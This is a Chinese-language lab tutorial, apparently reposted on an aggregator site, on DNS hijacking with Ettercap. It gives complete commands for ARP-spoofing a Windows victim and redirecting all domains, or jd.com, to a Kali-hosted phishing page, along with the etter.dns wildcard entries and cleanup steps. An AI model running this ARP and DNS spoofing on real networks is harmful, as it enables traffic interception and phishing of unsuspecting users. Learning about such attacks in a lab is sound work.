ARP渗透与攻防(七)之Ettercap Dns劫持

这篇具有很好参考价值的文章主要介绍了ARP渗透与攻防(七)之Ettercap Dns劫持。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据
ARP渗透与攻防(五)之Ettercap劫持用户流量
ARP渗透与攻防(六)之限制网速攻击

ARP-Ettercap Dns劫持

1.什么是DNS

1.概念

DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器。

2.工作过程

当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有那么才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中。

ARP渗透与攻防(七)之Ettercap Dns劫持

2.什么是DNS劫持

1.概念

DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。

2.ettercap劫持的原理

局域网劫持, 攻击者通过伪装成网关, 劫持受害者的网络请求, 将网络请求拦截到指定的服务器

3.DNS常用命令讲解

1.查看DNS缓存表

ipconfig /displaydns

ARP渗透与攻防(七)之Ettercap Dns劫持

2.获取DNS地址:

ping maishibing.com

ARP渗透与攻防(七)之Ettercap Dns劫持ARP渗透与攻防(七)之Ettercap Dns劫持

2.刷新DNS缓存

ipconfig /flushdns

ARP渗透与攻防(七)之Ettercap Dns劫持
ARP渗透与攻防(七)之Ettercap Dns劫持

3.ARP-DNS欺骗攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.kali开启apache服务
service apache2 start

ARP渗透与攻防(七)之Ettercap Dns劫持

2.kali浏览器访问Apache的首页
http://192.168.110.12

ARP渗透与攻防(七)之Ettercap Dns劫持确认apache服务已经开启

3.编辑ettercap配置文件
1.进入配置文件位置
cd /etc/ettercap

ARP渗透与攻防(七)之Ettercap Dns劫持ARP渗透与攻防(七)之Ettercap Dns劫持

2.复制原有的配置文件(环境恢复比较方便)
cp etter.dns etter.dns2

ARP渗透与攻防(七)之Ettercap Dns劫持ARP渗透与攻防(七)之Ettercap Dns劫持

3.设置dns劫持配置文件
vi /etc/ettercap/etter.dns
添加以下内容
*   A   192.168.110.12
*   PTR 192.168.110.12
wq保存
参数
*:通配符,代表所有的网站都将被解析到192.168.110.12 
也可以换成指定的网站,比如www.jd.com,表示将www.jd.com解析到192.168.110.12
A:常被用于正向地址解析,后面跟上钓鱼的ip地址
PTR :常被用于反向地址解析,后面跟上钓鱼的ip地址

ARP渗透与攻防(七)之Ettercap Dns劫持

ARP渗透与攻防(七)之Ettercap Dns劫持

5.ettercap劫持命令讲解
 ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关// 
 -i:网卡
 -T:文本模式
 -q:安静模式
 -M:执行mitm攻击
 -P:plugin 开始该插件
4.靶机访问以下网站确认环境正常
http://www.jd.com/

ARP渗透与攻防(七)之Ettercap Dns劫持

6.执行劫持命令
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.110.11// /192.168.110.1// >b.txt

ARP渗透与攻防(七)之Ettercap Dns劫持

7.分析日志
tail -f b.txt
或者
tail -f b.txt | grep "dns_spoof"

ARP渗透与攻防(七)之Ettercap Dns劫持

8.靶机重新访问以下网站查看攻击效果
http://www.jd.com/

ARP渗透与攻防(七)之Ettercap Dns劫持

可以看到虽然靶机访问的是jd.com,但打开的却是我们钓鱼的网站,DNS欺骗成功。

9.停止劫持
Ctrl+C
10.恢复dns列表,刷新dns缓存即可。
ipconfig /flushdns

刷新前:
ARP渗透与攻防(七)之Ettercap Dns劫持
刷新后:
ARP渗透与攻防(七)之Ettercap Dns劫持

11.靶机访问以下网站查看环境是否恢复正常
http://www.jd.com/

ARP渗透与攻防(七)之Ettercap Dns劫持
可以看到环境恢复正常了

12.恢复kali环境
1.进入配置文件位置
cd /etc/ettercap
2.复制dns文件到新文件
cp etter.dns etter.dns1
3.还原dns配置文件

将我们之前拷贝的etter.dns2备份文件回复正常文章来源地址https://www.toymoban.com/news/detail-453281.html

cp etter.dns2 etter.dns

到了这里,关于ARP渗透与攻防(七)之Ettercap Dns劫持的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • API 渗透测试从入门到精通系列文章(下)

    导语:在本系列文章的前面一部分我们从使用 Postman 开始,创建了集合和请求,并通过 Burp Suite 设置为了 Postman 的代理,这样我们就可以使用 Burp 的模糊测试和请求篡改的功能。 在本系列文章的前面一部分我们从使用 Postman 开始,创建了集合和请求,并通过 Burp Suite 设置为了

    2024年02月03日
    浏览(53)
  • DNS劫持是什么意思?DNS劫持是干什么用的?

    DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址。 DNS劫持原理 我们以用户访问淘宝网:www.taobao.

    2024年02月08日
    浏览(40)
  • HTTP 劫持、DNS 劫持与 XSS

    HTTP 劫持、DNS 劫持与 XSS http 劫持是指攻击者在客户端和服务器之间同时建立了连接通道,通过某种方式,让客户端请求发送到自己的服务器,然后自己就拥有了控制响应内容的能力,从而给客户端展示错误的信息,比如在页面中加入一些广告内容。 DNS 劫持是指攻击者劫持了

    2024年02月14日
    浏览(39)
  • 如何辨别:DNS污染or DNS劫持?

    DNS劫持: DNS 劫持是指恶意攻击者通过非法手段篡改了网络中的 DNS 服务器,将用户的访问请求导向了错误的 IP 地址,从而达到欺骗用户、窃取信息或进行其他恶意活动的目的。 其主要表现为: 改变用户原本想要访问的网站地址,使其访问到虚假或恶意的网站。 拦截用户的

    2024年04月17日
    浏览(43)
  • DNS、DNS劫持与HTTPDNS:原理、应用与安全分析

    DNS的工作原理主要包括以下几个步骤: 用户在浏览器中输入域名,浏览器会先检查本地DNS缓存是否有该域名对应的IP地址。如果有,直接返回IP地址,解析过程结束。 如果本地缓存没有,浏览器会向本地配置的DNS服务器(通常是ISP(Internet Service Provider,互联网服务提供商)的

    2024年04月15日
    浏览(64)
  • 遭遇dns劫持会有哪些现象

    DNS劫持是黑客入侵网站的常见手段。这种攻击会返回虚假信息,甚至无法访问网站。DNS劫持是比如你进入360的网站,但它是从百度的页面出来的。这意味着你的DNS被劫持了。 专业的DNS劫持,称为域名系统,是指在被劫持的网络范围内拦截域名解析请求,分析请求的域名,发布

    2024年02月12日
    浏览(43)
  • 35、WEB攻防——通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持

    XSS产生于前端的漏洞,常产生于: XSS分类: 反射型(非持久型) 存储型(持久型),攻击代码被写入数据库中。常见于:写日志、留言、评论的地方 DOM型 DOM型XSS与反射型XSS、存储型XSS的最大区别在于:DOM型XSS前端的数据是传输给前端JS代码进行处理,而反射型XSS、存储型

    2024年01月25日
    浏览(72)
  • WEB攻防通用漏洞&跨域CORS资源&JSONP回调&域名接管劫持

    目录 一、同源策略(SOC) 二、跨域资源(COSP) 三、回调跨域(JSOP) 四、CORS资源跨域-敏感页面原码获取 五、JSONP 回调跨域-某牙个人信息泄露 六、子域名劫持接管 同源策略 (SOP)-“ 同源 ” 包括三个条件:同协议、同域名、同端口。 会检测数据包的来源在哪里,进而来判

    2024年02月01日
    浏览(63)
  • 网站域名被劫持、网站dns被劫持 域名跳转到别的网站的解决方法

    网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 出现网站域名跳转到其他网站,这一现象很可能是域名被劫持。 【网站域名被劫持——概念】 简单来说,域名劫持就是把原本准备访问某网站

    2024年02月04日
    浏览(44)
  • 域名劫持、域名欺骗、域名污染是什么意思?DNS是啥?

    一、DNS 是啥? DNS 是洋文“Domain Name System”的缩写,直译过来就是“域名系统”。 二、DNS 有啥用? 咱们每天打交道的这个互联网,其底层的基石是“IP”。IP 是“Internet Protocol”的缩写,中文就“互联网协议”(光看名字就知道这玩意儿很重要)。咱们日常用的那些互联网软

    2024年02月08日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包